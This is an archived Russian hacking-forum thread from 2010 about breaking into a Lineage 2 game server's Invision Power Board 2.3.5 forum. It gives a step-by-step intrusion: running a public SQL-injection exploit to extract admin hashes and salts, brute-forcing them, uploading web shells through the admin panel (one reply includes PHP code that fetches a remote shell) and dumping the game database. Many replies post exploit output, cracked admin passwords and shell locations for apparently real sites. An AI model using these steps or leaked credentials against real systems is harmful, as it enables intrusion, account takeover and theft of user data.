PDA

Просмотр полной версии : [Уязвимость] Рабочая уязвимость на l2europe.net (сервер из топ15)


ATJIaHTuK
20.03.2010, 09:51
Взлом паблик багой одного из сервера в топ15 л2топа.
Работает на данный момент.
Базу заливать не буду - сделаете как на видео - сами сольете
Сайт - STRESSWEB 9, форум IPB.
Онлайн ~1k
В итоге получаем полный доступ к базе сервера(рисуете шмот, ГМправа,да что хотите и сливаете бд ).
В архиве сам видеофайл .avi ~15минут и txt файл из видео.
Размер архива ~115mb

>>ТыЦ<< ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
Взято с АЧ)
Нет возможности проверить, слишком большой размер.

Dimulya
20.03.2010, 12:23
Выложите плз текстовый документ.
Инет обрушился, через gprs сижу =)

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

PornFlakex
20.03.2010, 13:48
l2europe.net вот этот сервер всё отличто работает

Crawd
20.03.2010, 14:23
с базой только одна проблема добрая половина акков была создана брутерами которые забыли про авторегу в первые часы сервака

HellFire
20.03.2010, 16:48
Простенькое видео о взломе lineage сервера через паблик уязвимость:)
Нам нужен сплоит для ipb 2.3.5:) такой есть в паблике.
У меня он уже скачан, так что не важно:)
Я только что проделывал это, но для видео сделаю все еще раз.

Z:\usr\local\php5>php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 639 //строка запуска сплоита

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [20.03.2010 03:35:29]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 639
/ Trying to get the password hash
+ pass_hash=f2a22f4ef46399fee58d5887b5623b88 - хэш пароля админа
+ Ok, using hash f2a22f4ef46399fee58d5887b5623b88
/ Trying to get the password salt
+ pass_salt=-Y,9? - соль:)
+ Ok, using salt -Y,9?
+ Enjoy!

+ [20.03.2010 03:35:41]
+ Total: 187

f2a22f4ef46399fee58d5887b5623b88:-Y,9?

теперь нам надо сбрутить это и получить пароль:)
я буду использовать EGB от insidepro, можно использовать и passwordsPRO

Настройки программы. Будем брутить только маленькие символы=) Авось повезет
; Standard character sets:
; ?d: 0123456789
; ?l: abcdefghijklmnopqrstuvwxyz
; ?u: ABCDEFGHIJKLMNOPQRSTUVWXYZ
; ?s: !@#$%^&*()`~-_=+\|[]{};:'",.<>/?
CharacterSet=?l

Все, пароль нашелся. Он был простой...

C:\music NEW\egb(2)\Новая папка>"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
f2a22f4ef46399fee58d5887b5623b88:ybrbnf

All passwords found!
C:\music NEW\egb(2)\Новая папка>


Теперь заходим админом на форум.

Теперь нужно залить шелл в админку:)

[Ссылки могут видеть только зарегистрированные и активированные пользователи] - тут описано как сделать это

качаем [Ссылки могут видеть только зарегистрированные и активированные пользователи] =)
теперь заливаем в админку.

Сделали по инструкции и залили шелл:)

Сообщение от c0m
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

[Ссылки могут видеть только зарегистрированные и активированные пользователи] - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал


вот и наш шелл) теперь надо найти пароль от бд и слить её.

Данные от БД
define("DBHOST","localhost");
define("DBUSER","l2biz_l2");
define("DBPASS","1q2w3e");
define("DBNAME","l2biz_l2");
define("COLLATE","utf8");

Я для удобства залью другой шелл, ибо МНЕ тяжело работать с этим, не привык:)
WSO2 так гораздо удобнее=)
Подключаемся к БД

Нашли информацию о базах L2 сервера)
Все мы в бд ла2, да кстати движок на сайте стоит STRESSWEB 9.
Все, сливаем базу и выкладываем на allcheats.ru ;)
теперь стираем шеллы и идем спать.
Всем спасибо.


описание видео.

object
21.03.2010, 16:29
Не кто не даст ту программку?)
Сплоит Ип борда:notme:

fuzzion
21.03.2010, 16:36
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]

Underwhy
21.03.2010, 17:01
Да вы что...
Сплоит работает на 1% всех форумов IPB
Работает он ТОЛЬКО на 2.3.5

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1

Underwhy
21.03.2010, 17:22
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1

Ingi
21.03.2010, 17:41
2.3.5-ipb-multi.zip ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Bomjke
21.03.2010, 17:49
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
ХЕЛП :brberbrb:

Bomjke
21.03.2010, 17:58
Всё получилась теперь новая проблема вписал адрес нажимаю ентер открываетса новая командная строка с каким то текстом и сразу закрываетса, а в 1 ни чего не пишет ...

CeDou
21.03.2010, 18:34
D:\ololo>php.exe 2.3.5-ipb-multi.php
"php.exe" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом

Ололо, хелп xD

до этой строки php.exe 2.3.5-ipb-multi.php должен быть путь где находится php интерпритатор.

В большинстве случаев, если это денвер и ставилось по дефолту. путь будет как у автора

И файл 2.3.5-ipb-multi.php должен быть в папке с интерпритатором

fuzzion
21.03.2010, 18:49
у меня другая проблема - ввожу тип атаки урл етц. и мне опять показывают искходный код скрипта, как если бы я просто прописал его запуск x_x

Bomjke
21.03.2010, 20:12
[Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Форум IP.Board 2.3.5
Пробуйте мб у меня трабл ...

CeDou
21.03.2010, 22:11
у меня другая проблема - ввожу тип атаки урл етц. и мне опять показывают искходный код скрипта, как если бы я просто прописал его запуск x_x

такое и у меня
мб кто подскажет как это можно решить или что не так делаем

fuzzion
21.03.2010, 22:17
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

попробуй этот скрипт, мне помогло.

mandarinko
21.03.2010, 22:23
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

как определить sql prefix?
либо префикс правильный, но стоит защита?

mandarinko
21.03.2010, 22:28
кину пару сайтов, если расскажешь, че делать с префиксом. Дефолтный не принимает.

ExxtanzO
21.03.2010, 22:33
Практикуйтесь на здоровье...
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=abb647bada07836fc473eda72ef54884
+ Ok, using hash abb647bada07836fc473eda72ef54884
/ Trying to get the password salt
+ pass_salt=X&X^M
+ Ok, using salt X&X^M
+ Enjoy!

+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 3
/ Trying to get the password hash
+ pass_hash=5e635b8524bb078033c520594e1d1e16
+ Ok, using hash 5e635b8524bb078033c520594e1d1e16
/ Trying to get the password salt
+ pass_salt=v,6#{
+ Ok, using salt v,6#{
+ Enjoy!

+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 2
/ Trying to get the password hash
+ pass_hash=3b08fdb1aa90e8f4dac074dfeb62a5ad
+ Ok, using hash 3b08fdb1aa90e8f4dac074dfeb62a5ad
/ Trying to get the password salt
+ pass_salt=*El?}
+ Ok, using salt *El?}
+ Enjoy!

mandarinko
21.03.2010, 22:38
пол инета перерыл в поисках ответа
Sql prefix, как я понял, можно менять, при этом знать его будет только адм. следовательно сплойтом уже не побалуешься?)

fall0ut
21.03.2010, 22:40
[Ссылки могут видеть только зарегистрированные и активированные пользователи] вот ещё для практики

BuT9H(забыл пасс)
21.03.2010, 22:44
Скачал видео включил музыка идет но картинки нету,что делать?

mandarinko
21.03.2010, 22:46
Скачал видео включил музыка идет но картинки нету,что делать?

кодеки обнови.


+ [21.03.2010 22:44:30]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

вот эта ситуация меня интересует...

object
21.03.2010, 22:48
[Ссылки могут видеть только зарегистрированные и активированные пользователи]


:flood::flood:

Ingi
21.03.2010, 23:37
объясните пожалуйста, почему пишет вот такую фигню:

Attack(s):

+ [21.03.2010 23:34:58]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
+ Forum vulnerable!
/ Using default table prefix: ibf_<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Prefix ibf_ is incorrect!<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Mysql version 4
- Get prefix impossible!

+ [21.03.2010 23:35:03]
+ Total: 3

Nickitee
21.03.2010, 23:47
Народ, вот получил Hash и Salt, что дальше?
Какие настрокйи в Passpro выставлять желательно поподробней )

Ingi
21.03.2010, 23:49
наверно тебе сюда [Ссылки могут видеть только зарегистрированные и активированные пользователи] =)

Nickitee
21.03.2010, 23:53
Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo

Ingi
22.03.2010, 00:07
на сайт не надо ничего вводить.
хеш и соль надо в проге писать, а настройка по ссылке которую я скинул

Underwhy
22.03.2010, 00:16
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

Немного от ботана-Андервая: Это значит, что база форума имеет название не "ibf_" а какое либо другое. Вам это предстоит выяснить

-=Angel=-
22.03.2010, 01:11
Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo

Используй лучше онлайн расшифровку хешей md5
Вот парочка из них
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]*****for.me/

P.S. И эта уязвимость мало где работает( я имею виду сайты la2)
Думаете на АЧ выкладывали бы эту уязвимость и тем более без хайда

ExxtanzO
22.03.2010, 10:02
Знаю один пвп сервачек с онлайном 450+ в 9 утра (будний)

Форум вот такой Форум IP.Board 2.3.5 © 2010 IPS, Inc.

За консультаю по icq , скажу что за сервер :rolleyeyes:

559 758 526

На таких форумах пол рунета работает, надо чтоб версия NULL была

Underwhy
22.03.2010, 10:42
На таких форумах пол рунета работает, надо чтоб версия NULL была
На астериосе лицензия, но там эта уязвимость катит

ExxtanzO
22.03.2010, 10:53
На астериосе лицензия, но там эта уязвимость катит

на NULL просто в 90% случаев работает, а на лицензии маловероятно

{Spiker}
23.03.2010, 09:00
ребят кто может подсказать какова типа етот хеш (( а то голову сломал почти уже. И весь инет перерил
Буду очень признателень спс :hd::pandal:

pass_hash=0225035e0fec4d4b39759ad37a42312b
pass_salt=c46.5

fuzzion
23.03.2010, 09:11
если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]

Nickitee
23.03.2010, 17:59
если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]
Эммм, кажеться md5(md5($salt).md5($pass))
А не md5($md5(salt).md5($pass))

Добавлено через 1 час 18 минут
Расстреляйте меня, уже час бручу хэш, толку 0, незнаю может я не те настройки поставил, опытным брутерам: "Помогите рассшифровать хэш!"
хэш:f8e929c512b16d5f8b2b285d62a148f7
соль:hAh.S

3acuson
23.03.2010, 19:27
пароль:bluxome204
шелл уже давно залил

{Spiker}
23.03.2010, 20:30
если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]

Не подходит я спецом та зарегал свой акк и пробывал пароль взломать вообше ничево не происходит. Помогите кто может я уже весь инет перерил толку 0 от етово.
З.Ы. Уже брутил и EGB / Paswordpro. 0%:bow:

Добавлено через 2 минуты
ребят может кто научит не опытного ?
вот я пишу в цмд пхп.ехе но он не хочет его открывать...
можете объяснить по подробности?
Надо прописать путь к пхп.ехе, он просто так тибе не откроетса:brberbrb:

Nickitee
23.03.2010, 21:22
ешо вопрос,вот установил я денвер на деиске ц.
а как мне к ниму пробратся черз цмд?b:brberbrb:

Он те должен ещё "Виртуальный диск создать"
А на нём уже делать эти манипуляции

fuzzion
23.03.2010, 21:29
denwer тащит

Добавлено через 10 часов 58 минут
у кого там на функции ereg() ругалось, денвер свой любимый посавьте версией пониже, где пхп старый в комплекте и zend optimizer

Razzor
24.03.2010, 09:31
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

Немного от ботана-Андервая: Это значит, что база форума имеет название не "ibf_" а какое либо другое. Вам это предстоит выяснить
Или 2 вариант, там стоит IPB 3
А с 3 этот баг не прокатит.

Уточню пару нюансов, если кто не понял, сплойт работает только на IPB <=2.3.5.
На 3 выдает что не парильный префикс, если посмотреть код то можно понять, что скрипт говорит форум уязвим при условии что при переходе по спец ссылке мы видим сам форум, именно поэтому он думает, что 3 уязвима.

На 3 сейчас есть из паблика активные и пассивные XSS, можно стырить куки и подменить сессию.

alexskb
24.03.2010, 10:55
люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 6) получается вот что:
как переделать чтоб было как на видео
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
хотелось бы чтоб было вот так:
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Razzor
24.03.2010, 11:08
люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 6) получается вот что:
как переделать чтоб было как на видео

Поставить более старую версию Денвера, либо скачать отдельно пхп
Держи:
Attack(s):

+ [24.03.2010 13:02:10]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 6
/ Trying to get the password hash
+ pass_hash=a4f9fac3593d000d3f4d03e3b668c43d
+ Ok, using hash a4f9fac3593d000d3f4d03e3b668c43d
/ Trying to get the password salt
+ pass_salt=!)#@7
+ Ok, using salt !)#@7
+ Enjoy!

+ [24.03.2010 13:05:34]
+ Total: 182
Пароль сдался быстро: 908085

Razzor
24.03.2010, 11:12
Для особо ленивых, разархивируем куда хотим, открываем блокнотом START.bat, изменяем нужные параметры и запускаем START.bat
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

alexskb
24.03.2010, 16:46
люди плиз скинти ссылку на эту программу ЕГБ,точно такую как и на видео.:bow:

Bomjke
24.03.2010, 18:15
люди плиз скинти ссылку на эту программу ЕГБ,точно такую как и на видео.:bow:
Extreme GPU Bruteforcer ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

alexskb
24.03.2010, 19:17
Extreme GPU Bruteforcer ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

слухай а где там конфиг.тхт и конфиг.ини
он там прописывает "md5(md5($pass).md5($salt)).exe" conf.ini conf.txt
что мне прописывать?

Bomjke
24.03.2010, 19:26
слухай а где там конфиг.тхт и конфиг.ини
он там прописывает "md5(md5($pass).md5($salt)).exe" conf.ini conf.txt
что мне прописывать?
На сколько я понял
conf.ini=md5(md5($pass).md5($salt)).ini
conf.txt=md5(md5($pass).md5($salt)).txt
Если получиться отпишись.

Я думал будет гемор найти форум ... А тут расшифровать хеш ... КТО МОЖЕТ ПОМОЧЬ РАСШИФРОВАТЬ СТУКНИТЕ В ICQ:423-423-163

Helko
24.03.2010, 19:33
делай проще "md5(md5($salt).md5($pass)).exe" откроется второе окно и начнется расшифровка/ когда будет найден пароль там напишет

alexskb
24.03.2010, 19:34
На сколько я понял
conf.ini=md5(md5($pass).md5($salt)).ini
conf.txt=md5(md5($pass).md5($salt)).txt
Если получиться отпишись.

Я думал будет гемор найти форум ... А тут расшифровать хеш ... КТО МОЖЕТ ПОМОЧЬ РАСШИФРОВАТЬ СТУКНИТЕ В ICQ:423-423-163

так поготь.
что мне надо прописывать?
"md5(md5($pass).md5($salt)).exe" md5(md5($pass).md5($salt)).ini md5(md5($pass).md5($salt)).txt
а хэш где писать?
можешь написать всю строчку правильно?

Helko
24.03.2010, 19:43
"md5(md5($pass).md5($salt)).exe"
а хеш писать в папке проге там файл md5(md5($pass).md5($salt)).txt

alexskb
24.03.2010, 19:56
"md5(md5($pass).md5($salt)).exe"
а хеш писать в папке проге там файл md5(md5($pass).md5($salt)).txt

слух вроде все сделал как ты сказал.
открыл папку с прогой, открыл md5(md5($pass).md5($salt)).txt удолил от туда все(там было токо 6 хэшов)и вставил свой.
потм прописал "md5(md5($pass).md5($salt)).exe" и вот что вышло:
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
где я сделал ошибку?

slastik
26.03.2010, 18:36
Сделал все. Но хэш подбирает в пассвордпро очень долго...
Помогите рашифровать:
8f8e179ff31c6b0e927e355bb5439d69
соль: 8h%MC

sparrow3000
03.04.2010, 15:00
всё делаю по видео
но после ввода строчки
php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 28
нечего не происходит что делать ????

Helko
03.04.2010, 15:29
всё делаю по видео
но после ввода строчки
php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 28
нечего не происходит что делать ????

там лицензия стоит, непрокатит

Rea1
04.04.2010, 13:58
php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 1
Выдаёт такую хню.. Мол выбирите программу для открытие етого файла ...
Help :D

Helko
04.04.2010, 14:15
php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 1
Выдаёт такую хню.. Мол выбирите программу для открытие етого файла ...
Help :D

Денвер установил

Rea1
04.04.2010, 14:42
Установил ,но столкнулся с другой траблой ...

Underwhy
04.04.2010, 14:58
Проблема возникла потому-что после /forum/ стоит -

la2revo.ru

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [18.04.2010 14:56:40]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+ [18.04.2010 14:56:40]
+ Total: 1

slepp
06.04.2010, 13:56
C:\Documents and Settings\Администратор\1\Php>php.exe 2.3.5-ipb-multi.php -attac
k 3 -url [Ссылки могут видеть только зарегистрированные и активированные пользователи] -uid 1

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [06.04.2010 13:28:20]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=4115d1f83c891cdd27afe04bd4ca8eb6
+ Ok, using hash 4115d1f83c891cdd27afe04bd4ca8eb6
/ Trying to get the password salt
+ pass_salt=MhXDN
+ Ok, using salt MhXDN
+ Enjoy!

+ [06.04.2010 13:28:55]
+ Total: 181


пользуйтесь дальше хеша я не продвинулся)

Chipito
06.04.2010, 17:55
А нельзя ли без расшифроки хеша зайти на форум через хеш?

Helko
06.04.2010, 20:12
А нельзя ли без расшифроки хеша зайти на форум через хеш?

к сожалению нет:)

langes
06.04.2010, 23:02
Проблема возникла потому-что после /forum/ стоит -

la2revo.ru

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [18.04.2010 14:56:40]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+ [18.04.2010 14:56:40]
+ Total: 1

Attack(s):

+ [06.04.2010 22:57:13]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]***
/ IDS bypass: 1
/ Cheking sql-injection..
- Script not found
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]***/***?s=&act=xmlout&do=check-display-name&name
=%2527
+ [06.04.2010 22:57:14]
+ Total: 1

из-за чего может возникать данная ошибка?

cavern
06.04.2010, 23:28
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 2
/ Trying to get the password hash
+ pass_hash=f90845fb9872edcf0ece92f0fb862cfb
+ Ok, using hash f90845fb9872edcf0ece92f0fb862cfb
/ Trying to get the password salt
+ pass_salt=2e:|j
+ Ok, using salt 2e:|j
+ Enjoy!

+ [06.04.2010 23:18:29]
+ Total: 188
расшифровал пароль: skyline
а как логин узнать?

Ilnas
06.04.2010, 23:37
Думаю это очевидно, смотри кто на форуме админ:pandal:

sekaskissa
07.04.2010, 01:05
если ктото может помогите расшифровать 4115d1f83c891cdd27afe04bd4ca8eb6 вот эту бяку(

shamrik
07.04.2010, 02:47
Без соли ?

hash 4115d1f83c891cdd27afe04bd4ca8eb6
salt MhXDN
я брутил полным перебором, 8 символов, большие + малые буквы + цыфры, безрезультатно

TakeThat
07.04.2010, 03:24
Помогите расшифровать..
pass_hash=15cc4c50a75cb2d3cbf6223a817132c0

langes
07.04.2010, 12:02
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
что делать?)

Chipito
07.04.2010, 12:45
С логином напряги,в IPB есть имя для отображения и сам логин,тоисть пасс есть а вот логина нету=)

SandeL
07.04.2010, 23:07
Народ сори за тупой вопрос

/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
/
+ Ok, using hash 140db6898b1ce6afc16e5a581d6a1379 <<<<Это хеш??
/ Trying to get the password salt
/
+ Ok, using salt TxqKE <<<<А это чо такое понять немогу
+ Enjoy!

+ [07.04.2010 22:55:49]
+ Total: 182

Chipito
08.04.2010, 00:30
В ипб 2.0+ начали ложить сальт,если расшифровуеш в пассворд про нада ставить хеш тайп md5(md5($salt),md5($pass)) [PHP]

fuzzion
08.04.2010, 12:04
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]

этот подойдет

Toopoi
08.04.2010, 19:58
умя такая проблема делаю все норм но какаято ошибка

*[Ссылки могут видеть только зарегистрированные и активированные пользователи]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>

shamrik
08.04.2010, 20:14
умя такая проблема делаю все норм но какаято ошибка

*[Ссылки могут видеть только зарегистрированные и активированные пользователи]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>
Там уже стоит IPB 2.3.6

maksline
09.04.2010, 11:26
я был бы очень признателен если бы вы помогли мне расшифровать
+ Ok, using hash 47afebaef8098a0af34963b813d10535
/ Trying to get the password salt
/
+ Ok, using salt ?T"{A
Спасибо за ранее :)

Toopoi
09.04.2010, 19:29
дайти плиз форум с рабочий дырой где не проверял не рубит хоть разобратс либа я не то делаю либа не нахажу то что надо

cavern
09.04.2010, 19:57
еще один способ заливки шелла:
Админцентр > настройки > Cookies > Добавить настройку > название: shell > PHP код:
$data=implode('',file('[Ссылки могут видеть только зарегистрированные и активированные пользователи]'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);
сохраняем, шелл будет доступен по /forum/admin/shell.php

кстати вот еще один шелл, как на видео, думаю с помощью заливки одного этот залить не составит труда: _[Ссылки могут видеть только зарегистрированные и активированные пользователи]

maksline пфф расшифровал за 2 секунды, пароль: 147369

SetFer
09.04.2010, 20:26
Attack(s):

+ [06.04.2010 22:57:13]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]***
/ IDS bypass: 1
/ Cheking sql-injection..
- Script not found
/ Try лялялялялялял
+ [06.04.2010 22:57:14]
+ Total: 1

Ответьте на эту проблему плиз народ)

SandeL
09.04.2010, 20:41
Народ расшифруйте плиз

+ Ok, using hash b0ef4c06dbdc7185b043d2e125bd3923
/ Trying to get the password salt
/
+ Ok, using salt Eio+6
+ Enjoy!

cavern
09.04.2010, 21:33
можете потренироваться, хеши в PasswordPro расшифровывают
Attack(s):

+ [09.04.2010 20:39:01]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=a1b820aa0f7fcd4a827d8286eddda74e
+ Ok, using hash a1b820aa0f7fcd4a827d8286eddda74e
/ Trying to get the password salt
+ pass_salt=-R]]3
+ Ok, using salt -R]]3
+ Enjoy!

+ [09.04.2010 20:56:14]
+ Total: 188
админ логин: Insane
пасс: yaebashu
залил шеллов в uploads, т.к. нет прав заливать в другие папки
первый шелл через скины: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
данные БД находятся в файле conf_global.php

п.с. сразу форум не убивайте тока)
п.с.с вот вся база одного из форумов, который уже удален _[Ссылки могут видеть только зарегистрированные и активированные пользователи]
а вот отдельно дамп members.sql _[Ссылки могут видеть только зарегистрированные и активированные пользователи]
кто знает что можно извлечь из базы ФОРУМА?

setfer префиксы хз, можно попробовать в пхп файле найти и заменить все ibf_ на ipb_ и то не факт что там такой префикс)
Script not found это значит что уязвимый код не найден, получить хеш не возможно


upd: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
админ емайл [Ссылки могут видеть только зарегистрированные и активированные пользователи]
пасс asdfasdf

шеллы:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

SetFer
09.04.2010, 22:37
B смысле в пхп в файле експлоита изменить все ipf на ipb?

Chipito
16.04.2010, 12:39
2.3.5 Не ломаются,надо чтоб был форум именно NULL RU

Underwhy
16.04.2010, 13:21
2.3.5 Не ломаются,надо чтоб был форум именно NULL RU
Вообще-то скрипт написан для 2.3.5

sunches
19.04.2010, 10:50
+ [19.04.2010 10:47:59]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+ [19.04.2010 10:48:00]
+ Total: 1

что это может быть?

Underwhy
19.04.2010, 11:08
+ [19.04.2010 10:47:59]
+ [Ссылки могут видеть только зарегистрированные и активированные пользователи]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
